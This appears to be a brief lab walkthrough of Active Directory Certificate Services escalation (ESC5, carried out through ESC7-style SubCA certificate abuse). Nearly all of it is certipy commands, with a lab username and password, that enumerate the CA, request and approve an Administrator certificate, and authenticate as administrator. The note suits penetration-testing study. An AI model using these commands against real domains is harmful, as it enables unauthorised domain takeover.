ESC5 is a domain escalation technique that exploits weak access controls on Active Directory objects indirectly linked to ADCS. These objects can enable privilege escalation through ADCS.
The entire Public Key Infrastructure or PKI can be compromised if an account has elevated privileges over objects tied to ADCS configuration or the ADCS server is compromised.
ESC5 Abuse from Linux
Enumerate ADCS servier using -ns for DNS server IP and -dns-tcp so it uses TCP.
proxychains4 -q certipy find -u cken -p Superman001 -dc-ip 172.16.19.3 -stdout -ns 172.16.19.3 -dns-tcpReplicate ESC7 attack using SubCA temmplate to generate a certificate as administrator. Specify -target-ip <ADCS Server> option since the ADCS server and the domain controller are different servers.
proxychains4 -q certipy req -u cken -p Superman001 -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -target-ip 172.16.19.5 -ca lab-WS01-CA -template SubCA -upn AdministratorApprove the request using the right ID from previous step.
proxychains4 -q certipy ca -u cken -p Superman001 -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -target-ip 172.16.19.5 -ca lab-WS01-CA -issue-request 10Finally retrieve the certificate and authenticate
# Retrieve
proxychains4 -q certipy req -u cken -p Superman001 -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -target-ip 172.16.19.5 -ca lab-WS01-CA -retrieve 10
# Authenticate
proxychains4 -q certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp